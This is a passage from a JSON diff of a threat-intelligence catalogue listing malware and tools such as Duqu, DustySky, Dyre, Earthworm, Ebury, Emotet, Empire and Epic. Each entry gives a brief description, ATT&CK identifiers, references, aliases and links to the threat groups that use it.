[proc_creation_win_dumpminitool_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml)\n* Sigma: [proc_creation_win_devinit_lolbin_usage.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml)[[DumpMinitool.exe - LOLBAS Project](/references/4634e025-c005-46fe-b97c-5d7dda455ba0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5219", + "source": "Tidal Cyber", + "tags": [ + "3b6ad94f-83ce-47bf-b82d-b98358d23434", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "2aeee11b-2b25-4b93-ad2f-1bb60ac491a4", + "type": "similar" + } + ], + "uuid": "7f3bf76a-4e6a-45f1-a4bf-400d5a914e52", + "value": "DumpMinitool" + }, + { + "description": "[Duqu](https://app.tidalcyber.com/software/d4a664e5-9819-4f33-8b2b-e6f8e6a64999) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. [[Symantec W32.Duqu](https://app.tidalcyber.com/references/8660411a-6b9c-46c2-8f5f-049ec60c7d40)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0038", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "68dca94f-c11d-421e-9287-7c501108e18c", + "type": "similar" + } + ], + "uuid": "d4a664e5-9819-4f33-8b2b-e6f8e6a64999", + "value": "Duqu" + }, + { + "description": "", + "meta": { + "id": "d1c03706-295a-4266-aaff-8383523be9c9" + }, + "related": [ + { + "dest-uuid": "77506f02-104f-4aac-a4e0-9649bd7efe2e", + "type": "similar" + } + ], + "uuid": "f41beff8-0ae1-48d6-bb13-b47c4763f4d1", + "value": "NeD Worm" + }, + { + "description": "[DustySky](https://app.tidalcyber.com/software/77506f02-104f-4aac-a4e0-9649bd7efe2e) is multi-stage malware written in .NET that has been used by [Molerats](https://app.tidalcyber.com/groups/679b7b6b-9659-4e56-9ffd-688a6fab01b6) since May 2015. [[DustySky](https://app.tidalcyber.com/references/b9e0770d-f54a-4ada-abd1-65c45eee00fa)] [[DustySky2](https://app.tidalcyber.com/references/4a3ecdec-254c-4eb4-9126-f540bb21dffe)][[Kaspersky MoleRATs April 2019](https://app.tidalcyber.com/references/38216a34-5ffd-4e79-80b1-7270743b728e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0062", + "source": "MITRE", + "tags": [ + "e809d252-12cc-494d-94f5-954c49eb87ce" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "679b7b6b-9659-4e56-9ffd-688a6fab01b6", + "type": "used-by" + }, + { + "dest-uuid": "687c23e4-4e25-4ee7-a870-c5e002511f54", + "type": "similar" + }, + { + "dest-uuid": "f41beff8-0ae1-48d6-bb13-b47c4763f4d1", + "type": "similar" + } + ], + "uuid": "77506f02-104f-4aac-a4e0-9649bd7efe2e", + "value": "DustySky" + }, + { + "description": "[[Dxcap.exe - LOLBAS Project](/references/7611eb7a-46b7-4c76-9728-67c1fbf20e17)]", + "meta": { + "id": "3695b720-e485-41d3-b135-d3025c199cc6", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "9b5039b9-c5f1-4516-88ef-f63966ec2b36", + "type": "similar" + } + ], + "uuid": "71444288-becb-435f-b1f9-b4abce44d092", + "value": "Dxcap.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** DirectX diagnostics/debugger included with Visual Studio.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\dxcap.exe\n* C:\\Windows\\SysWOW64\\dxcap.exe\n\n**Resources:**\n* [https://twitter.com/harr0ey/status/992008180904419328](https://twitter.com/harr0ey/status/992008180904419328)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_dxcap.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_dxcap.yml)[[Dxcap.exe - LOLBAS Project](/references/7611eb7a-46b7-4c76-9728-67c1fbf20e17)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5220", + "source": "Tidal Cyber", + "tags": [ + "6d065f28-e32d-4e87-b315-c43ebc45532a", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "71444288-becb-435f-b1f9-b4abce44d092", + "type": "similar" + } + ], + "uuid": "9b5039b9-c5f1-4516-88ef-f63966ec2b36", + "value": "Dxcap" + }, + { + "description": "[[Sophos Dyreza April 2015](https://app.tidalcyber.com/references/50f9aa49-dde5-42c9-ba5c-f42281a71b7e)]", + "meta": { + "id": "1eb50200-1a51-4829-ac96-6f74430bbe3a" + }, + "related": [ + { + "dest-uuid": "38e012f7-fb3a-4250-a129-92da3a488724", + "type": "similar" + } + ], + "uuid": "5cad75f1-7395-4eb1-9370-c36857b4fcb4", + "value": "Dyzap" + }, + { + "description": "[[Sophos Dyreza April 2015](https://app.tidalcyber.com/references/50f9aa49-dde5-42c9-ba5c-f42281a71b7e)]", + "meta": { + "id": "5df5b306-56dc-41d2-8a8f-91947d1d6e66" + }, + "related": [ + { + "dest-uuid": "38e012f7-fb3a-4250-a129-92da3a488724", + "type": "similar" + } + ], + "uuid": "ee1346ac-a3e0-45dd-963c-497fca47c3e8", + "value": "Dyreza" + }, + { + "description": "[Dyre](https://app.tidalcyber.com/software/38e012f7-fb3a-4250-a129-92da3a488724) is a banking Trojan that has been used for financial gain. \n [[Symantec Dyre June 2015](https://app.tidalcyber.com/references/a9780bb0-302f-44c2-8252-b53d94da24e6)][[Malwarebytes Dyreza November 2015](https://app.tidalcyber.com/references/0a5719f2-8a88-44e2-81c5-2d16a39f1f8d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0024", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "63c2a130-8a5b-452f-ad96-07cf0af12ffe", + "type": "similar" + }, + { + "dest-uuid": "5cad75f1-7395-4eb1-9370-c36857b4fcb4", + "type": "similar" + }, + { + "dest-uuid": "ee1346ac-a3e0-45dd-963c-497fca47c3e8", + "type": "similar" + } + ], + "uuid": "38e012f7-fb3a-4250-a129-92da3a488724", + "value": "Dyre" + }, + { + "description": "Earthworm is an open-source tool. According to its project website, Earthworm is a \"simple network tunnel with SOCKS v5 server and port transfer\".[[Elastic Docs Potential Protocol Tunneling via EarthWorm](/references/a02790a1-f7c5-43b6-bc7e-075b2c0aa791)] According to joint Cybersecurity Advisory AA23-144a (May 2023), Volt Typhoon actors have used Earthworm in their attacks.[[U.S. CISA Volt Typhoon May 24 2023](/references/12320f38-ebbf-486a-a450-8a548c3722d6)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5013", + "source": "Tidal Cyber", + "tags": [ + "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + } + ], + "uuid": "ee14e483-b5ef-4931-9c2a-72046b6555cc", + "value": "Earthworm" + }, + { + "description": "[Ebury](https://app.tidalcyber.com/software/2375465a-e6a9-40ab-b631-a5b04cf5c689) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).[[ESET Ebury Feb 2014](https://app.tidalcyber.com/references/eb6d4f77-ac63-4cb8-8487-20f9e709334b)][[BleepingComputer Ebury March 2017](https://app.tidalcyber.com/references/e5d69297-b0f3-4586-9eb7-d2922b3ee7bb)][[ESET Ebury Oct 2017](https://app.tidalcyber.com/references/5257a8ed-1cc8-42f8-86a7-8c0fd0e553a7)]", + "meta": { + "platforms": [ + "Linux" + ], + "software_attack_id": "S0377", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eeb69751-8c22-4a5f-8da2-239cc7d7746c", + "type": "used-by" + }, + { + "dest-uuid": "d6b3fcd0-1c86-4350-96f0-965ed02fcc51", + "type": "similar" + } + ], + "uuid": "2375465a-e6a9-40ab-b631-a5b04cf5c689", + "value": "Ebury" + }, + { + "description": "[ECCENTRICBANDWAGON](https://app.tidalcyber.com/software/70f703b3-0e24-4ffe-9772-f0e386ec607f) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.[[CISA EB Aug 2020](https://app.tidalcyber.com/references/a1b143f9-ca85-4c11-8909-49423c9ffeab)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0593", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "dfbce236-735c-436d-b433-933bd6eae17b", + "type": "used-by" + }, + { + "dest-uuid": "0bc66e95-de93-4de7-b415-4041b7191f08", + "type": "used-by" + }, + { + "dest-uuid": "e928333f-f3df-4039-9b8b-556c2add0e42", + "type": "similar" + } + ], + "uuid": "70f703b3-0e24-4ffe-9772-f0e386ec607f", + "value": "ECCENTRICBANDWAGON" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "7a48fb2f-6237-412d-bc9e-cc7dc2658800" + }, + "related": [ + { + "dest-uuid": "6508d3dc-eb22-468c-9122-dcf541caa69c", + "type": "similar" + } + ], + "uuid": "3c935fc9-aedf-4800-b6a1-f52612702600", + "value": "HEAVYHAND" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "078fc151-e008-4984-a3bc-a6678e279e66" + }, + "related": [ + { + "dest-uuid": "6508d3dc-eb22-468c-9122-dcf541caa69c", + "type": "similar" + } + ], + "uuid": "8c68d850-b73d-40d8-9499-26ec1c1dbbb2", + "value": "SigLoader" + }, + { + "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "id": "01b34b53-64bf-4504-b18f-44f05a504a57" + }, + "related": [ + { + "dest-uuid": "6508d3dc-eb22-468c-9122-dcf541caa69c", + "type": "similar" + } + ], + "uuid": "a24219ab-2f4a-4922-864c-ea07e354bab2", + "value": "DESLoader" + }, + { + "description": "[Ecipekac](https://app.tidalcyber.com/software/6508d3dc-eb22-468c-9122-dcf541caa69c) is a multi-layer loader that has been used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) since at least 2019 including use as a loader for [P8RAT](https://app.tidalcyber.com/software/1933ad3d-3085-4b1b-82b9-ac51b440e2bf), [SodaMaster](https://app.tidalcyber.com/software/6ecd970c-427b-4421-a831-69f46047d22a), and [FYAnti](https://app.tidalcyber.com/software/be9a2ae5-373a-4dee-9c1e-b54235dafed0).[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0624", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "292eb0c5-b8e8-4af6-9e8f-0fda6b4528d3", + "type": "similar" + }, + { + "dest-uuid": "3c935fc9-aedf-4800-b6a1-f52612702600", + "type": "similar" + }, + { + "dest-uuid": "8c68d850-b73d-40d8-9499-26ec1c1dbbb2", + "type": "similar" + }, + { + "dest-uuid": "a24219ab-2f4a-4922-864c-ea07e354bab2", + "type": "similar" + } + ], + "uuid": "6508d3dc-eb22-468c-9122-dcf541caa69c", + "value": "Ecipekac" + }, + { + "description": "[Egregor](https://app.tidalcyber.com/software/0e36b62f-a6e2-4406-b3d9-e05204e14a66) is a Ransomware-as-a-Service (RaaS) tool that was first observed in September 2020. Researchers have noted code similarities between [Egregor](https://app.tidalcyber.com/software/0e36b62f-a6e2-4406-b3d9-e05204e14a66) and Sekhmet ransomware, as well as [Maze](https://app.tidalcyber.com/software/3c206491-45c0-4ff7-9f40-45f9aae4de64) ransomware.[[NHS Digital Egregor Nov 2020](https://app.tidalcyber.com/references/92f74037-2a20-4667-820d-2ccc0e4dbd3d)][[Cyble Egregor Oct 2020](https://app.tidalcyber.com/references/545a131d-88fc-4b34-923c-0b759b45fc7f)][[Security Boulevard Egregor Oct 2020](https://app.tidalcyber.com/references/cd37a000-9e15-45a3-a7c9-bb508c10e55d)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0554", + "source": "MITRE", + "tags": [ + "3c3f9078-5d1e-4c29-a5eb-28f237bbd1ad", + "0ed7d10c-c65b-4174-9edb-446bf301d250", + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "cc4c1287-9c86-4447-810c-744f3880ec37", + "type": "similar" + } + ], + "uuid": "0e36b62f-a6e2-4406-b3d9-e05204e14a66", + "value": "Egregor" + }, + { + "description": "[[FireEye Ransomware Feb 2020](https://app.tidalcyber.com/references/44856547-2de5-45ff-898f-a523095bd593)]", + "meta": { + "id": "7eed201b-5296-4e1d-aef8-09020912ee1e" + }, + "related": [ + { + "dest-uuid": "cd7821cb-32f3-4d81-a5d1-0cdee94a15c4", + "type": "similar" + } + ], + "uuid": "de4852b9-1f8b-4ef2-b3da-29be62458ea5", + "value": "SNAKEHOSE" + }, + { + "description": "[EKANS](https://app.tidalcyber.com/software/cd7821cb-32f3-4d81-a5d1-0cdee94a15c4) is ransomware variant written in Golang that first appeared in mid-December 2019 and has been used against multiple sectors, including energy, healthcare, and automotive manufacturing, which in some cases resulted in significant operational disruptions. [EKANS](https://app.tidalcyber.com/software/cd7821cb-32f3-4d81-a5d1-0cdee94a15c4) has used a hard-coded kill-list of processes, including some associated with common ICS software platforms (e.g., GE Proficy, Honeywell HMIWeb, etc), similar to those defined in [MegaCortex](https://app.tidalcyber.com/software/d8a4a817-2914-47b0-867c-ad8eeb7efd10).[[Dragos EKANS](https://app.tidalcyber.com/references/c8a018c5-caa3-4af1-b210-b65bbf94c8b2)][[Palo Alto Unit 42 EKANS](https://app.tidalcyber.com/references/dcdd4e48-3c3d-4008-a6f6-390f896f147b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0605", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "type": "similar" + }, + { + "dest-uuid": "de4852b9-1f8b-4ef2-b3da-29be62458ea5", + "type": "similar" + } + ], + "uuid": "cd7821cb-32f3-4d81-a5d1-0cdee94a15c4", + "value": "EKANS" + }, + { + "description": "[[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]", + "meta": { + "id": "7bcca200-50e1-4a9d-8132-cecee4ba978e" + }, + "related": [ + { + "dest-uuid": "fd5efee9-8710-4536-861f-c88d882f4d24", + "type": "similar" + } + ], + "uuid": "87856d15-2fdc-42fd-b8c0-d48505ec5691", + "value": "Page" + }, + { + "description": "[[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)]", + "meta": { + "id": "c77bf151-07c8-43e2-9939-80d41fb72305" + }, + "related": [ + { + "dest-uuid": "fd5efee9-8710-4536-861f-c88d882f4d24", + "type": "similar" + } + ], + "uuid": "12b94df0-6a70-4946-8672-72e770bc12a1", + "value": "BKDR_ESILE" + }, + { + "description": "[Elise](https://app.tidalcyber.com/software/fd5efee9-8710-4536-861f-c88d882f4d24) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52). It is part of a larger group of\ntools referred to as LStudio, ST Group, and APT0LSTU. [[Lotus Blossom Jun 2015](https://app.tidalcyber.com/references/46fdb8ca-b14d-43bd-a20f-cae7b26e56c6)][[Accenture Dragonfish Jan 2018](https://app.tidalcyber.com/references/f692c6fa-7b3a-4d1d-9002-b1a59f7116f4)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0081", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "2849455a-cf39-4a9f-bd89-c2b3c1e5dd52", + "type": "used-by" + }, + { + "dest-uuid": "7551188b-8f91-4d34-8350-0d0c57b2b913", + "type": "similar" + }, + { + "dest-uuid": "87856d15-2fdc-42fd-b8c0-d48505ec5691", + "type": "similar" + }, + { + "dest-uuid": "12b94df0-6a70-4946-8672-72e770bc12a1", + "type": "similar" + } + ], + "uuid": "fd5efee9-8710-4536-861f-c88d882f4d24", + "value": "Elise" + }, + { + "description": "[ELMER](https://app.tidalcyber.com/software/6a3ca97e-6dd6-44e5-a5f0-7225099ab474) is a non-persistent, proxy-aware HTTP backdoor written in Delphi that has been used by [APT16](https://app.tidalcyber.com/groups/06a05175-0812-44f5-a529-30eba07d1762). [[FireEye EPS Awakens Part 2](https://app.tidalcyber.com/references/7fd58ef5-a0b7-40b6-8771-ca5e87740965)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0064", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "06a05175-0812-44f5-a529-30eba07d1762", + "type": "used-by" + }, + { + "dest-uuid": "3cab1b76-2f40-4cd0-8d2c-7ed16eeb909c", + "type": "similar" + } + ], + "uuid": "6a3ca97e-6dd6-44e5-a5f0-7225099ab474", + "value": "ELMER" + }, + { + "description": "[Emissary](https://app.tidalcyber.com/software/fd95d38d-83f9-4b31-8292-ba2b04275b36) is a Trojan that has been used by [Lotus Blossom](https://app.tidalcyber.com/groups/2849455a-cf39-4a9f-bd89-c2b3c1e5dd52). It shares code with [Elise](https://app.tidalcyber.com/software/fd5efee9-8710-4536-861f-c88d882f4d24), with both Trojans being part of a malware group referred to as LStudio. [[Lotus Blossom Dec 2015](https://app.tidalcyber.com/references/dcbe51a0-6d63-4401-b19e-46cd3c42204c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0082", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "2849455a-cf39-4a9f-bd89-c2b3c1e5dd52", + "type": "used-by" + }, + { + "dest-uuid": "0f862b01-99da-47cc-9bdb-db4a86a95bb1", + "type": "similar" + } + ], + "uuid": "fd95d38d-83f9-4b31-8292-ba2b04275b36", + "value": "Emissary" + }, + { + "description": "[[Trend Micro Emotet Jan 2019](https://app.tidalcyber.com/references/a81f1dad-5841-4142-80c1-483b240fd67d)]", + "meta": { + "id": "fb223f10-20b0-4647-9383-3041ad7001b6" + }, + "related": [ + { + "dest-uuid": "c987d255-a351-4736-913f-91e2f28d0654", + "type": "similar" + } + ], + "uuid": "ee981808-fa0c-462c-b767-e48f1ca7122a", + "value": "Geodo" + }, + { + "description": "[Emotet](https://app.tidalcyber.com/software/c987d255-a351-4736-913f-91e2f28d0654) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://app.tidalcyber.com/software/c2bd4213-fc7b-474f-b5a0-28145b07c51d) and [IcedID](https://app.tidalcyber.com/software/7f59bb7c-5fa9-497d-9d8e-ba9349fd9433). Emotet first emerged in June 2014 and has been primarily used to target the banking sector. [[Trend Micro Banking Malware Jan 2019](https://app.tidalcyber.com/references/4fee21e3-1b8f-4e10-b077-b59e2df94633)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0367", + "source": "MITRE", + "tags": [ + "71dfe8d1-666f-4e71-8761-d2876078fb3e", + "84615fe0-c2a5-4e07-8957-78ebc29b4635", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "32066e94-3112-48ca-b9eb-ba2b59d2f023", + "type": "similar" + }, + { + "dest-uuid": "ee981808-fa0c-462c-b767-e48f1ca7122a", + "type": "similar" + } + ], + "uuid": "c987d255-a351-4736-913f-91e2f28d0654", + "value": "Emotet" + }, + { + "description": "[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]", + "meta": { + "id": "170fe9fa-1386-490d-97d4-b4a099fbd686" + }, + "related": [ + { + "dest-uuid": "fea655ac-558f-4dd0-867f-9a5553626207", + "type": "similar" + } + ], + "uuid": "55859df1-5c3b-4b9b-b0d0-39c5c82c59f9", + "value": "EmPyre" + }, + { + "description": "[[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)]", + "meta": { + "id": "c313912e-cd3c-4ae8-ab5a-c3ab40585762" + }, + "related": [ + { + "dest-uuid": "fea655ac-558f-4dd0-867f-9a5553626207", + "type": "similar" + } + ], + "uuid": "8745d0f6-8771-4588-bd2f-b80d418908ee", + "value": "PowerShell Empire" + }, + { + "description": "[Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) for Windows and Python for Linux/macOS. [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[[NCSC Joint Report Public Tools](https://app.tidalcyber.com/references/601d88c5-4789-4fa8-a9ab-abc8137f061c)][[Github PowerShell Empire](https://app.tidalcyber.com/references/017ec673-454c-492a-a65b-10d3a20dfdab)][[GitHub ATTACK Empire](https://app.tidalcyber.com/references/b3d6bb33-2b23-4c0a-b8fa-e002a5c7edfc)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "software_attack_id": "S0363", + "source": "MITRE", + "tags": [ + "4f05a12d-f497-4081-acb9-9a257ab87886", + "15787198-6c8b-4f79-bf50-258d55072fee", + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", + "e81ba503-60b0-4b64-8f20-ef93e7783796" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "12279b62-289e-49ee-97cb-c780edd3d091", + "type": "used-by" + }, + { + "dest-uuid": "73da066d-b25f-45ba-862b-1a69228c6baa", + "type": "used-by" + }, + { + "dest-uuid": "6d6ed42c-760c-4964-a81e-1d4df06a8800", + "type": "used-by" + }, + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "3c7ad595-1940-40fc-b9ca-3e649c1e5d87", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "dcb260d8-9d53-404f-9ff5-dbee2c6effe6", + "type": "used-by" + }, + { + "dest-uuid": "2e2d3e75-1160-4ba5-80cc-8e7685fcfc44", + "type": "used-by" + }, + { + "dest-uuid": "b534349f-55a4-41b8-9623-6707765c3c50", + "type": "used-by" + }, + { + "dest-uuid": "6a8f5eca-8ecc-4bff-9c5f-5380e044ed5b", + "type": "used-by" + }, + { + "dest-uuid": "0b431229-036f-4157-a1da-ff16dfc095f8", + "type": "used-by" + }, + { + "dest-uuid": "eecf7289-294f-48dd-a747-7705820f4735", + "type": "used-by" + }, + { + "dest-uuid": "99bbbe25-45af-492f-a7ff-7cbc57828bac", + "type": "used-by" + }, + { + "dest-uuid": "345e553a-164d-4c9d-8bf9-19fcf8a51533", + "type": "used-by" + }, + { + "dest-uuid": "570198e3-b59c-5772-b1ee-15d7ea14d48a", + "type": "used-by" + }, + { + "dest-uuid": "713e2963-fbf4-406f-a8cf-6a4489d90439", + "type": "used-by" + }, + { + "dest-uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "type": "similar" + }, + { + "dest-uuid": "55859df1-5c3b-4b9b-b0d0-39c5c82c59f9", + "type": "similar" + }, + { + "dest-uuid": "8745d0f6-8771-4588-bd2f-b80d418908ee", + "type": "similar" + } + ], + "uuid": "fea655ac-558f-4dd0-867f-9a5553626207", + "value": "Empire" + }, + { + "description": "[EnvyScout](https://app.tidalcyber.com/software/8da6fbf0-a18d-49a0-9235-101300d49d5e) is a dropper that has been used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2021.[[MSTIC Nobelium Toolset May 2021](https://app.tidalcyber.com/references/52464e69-ff9e-4101-9596-dd0c6404bf76)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0634", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "2f8229dc-da94-41c6-89ba-b5b6c32f6b7d", + "type": "similar" + } + ], + "uuid": "8da6fbf0-a18d-49a0-9235-101300d49d5e", + "value": "EnvyScout" + }, + { + "description": "[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", + "meta": { + "id": "456cbe78-3e2c-4310-95f7-029e2dac553e" + }, + "related": [ + { + "dest-uuid": "a7e71387-b276-413c-a0de-4cf07e39b158", + "type": "similar" + } + ], + "uuid": "c9f72733-1557-4a9c-9a07-b87e80d84b01", + "value": "Tavdig" + }, + { + "description": "[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", + "meta": { + "id": "e3abe367-cba2-4d67-ace9-10a4c74418a7" + }, + "related": [ + { + "dest-uuid": "a7e71387-b276-413c-a0de-4cf07e39b158", + "type": "similar" + } + ], + "uuid": "b0614725-7a40-4a46-9d57-79dfd157af91", + "value": "Wipbot" + }, + { + "description": "[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", + "meta": { + "id": "0755050c-dc93-49dc-977a-d28f7ce51fac" + }, + "related": [ + { + "dest-uuid": "a7e71387-b276-413c-a0de-4cf07e39b158", + "type": "similar" + } + ], + "uuid": "40bd7e6b-f282-4fac-a707-e21b256e0c52", + "value": "WorldCupSec" + }, + { + "description": "[[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", + "meta": { + "id": "e009a3b2-5a6f-44cb-84ea-9da186d101a5" + }, + "related": [ + { + "dest-uuid": "a7e71387-b276-413c-a0de-4cf07e39b158", + "type": "similar" + } + ], + "uuid": "eafca858-2534-4dea-b50c-ddf9a9a490f8", + "value": "TadjMakhal" + }, + { + "description": "[Epic](https://app.tidalcyber.com/software/a7e71387-b276-413c-a0de-4cf07e39b158) is a backdoor that has been used by [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2). [[Kaspersky Turla](https://app.tidalcyber.com/references/535e9f1a-f89e-4766-a290-c5b8100968f8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0091", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "6b62e336-176f-417b-856a-8552dd8c44e1", + "type": "similar" + }, + { + "dest-uuid": "c9f72733-1557-4a9c-9a07-b87e80d84b01", + "type": "similar" + }, + { + "dest-uuid": "b0614725-7a40-4a46-9d57-79dfd157af91", + "type": "similar" + }, + { + "dest-uuid": "40bd7e6b-f282-4fac-a707-e21b256e0c52", + "type": "similar" + }, + { + "dest-uuid": 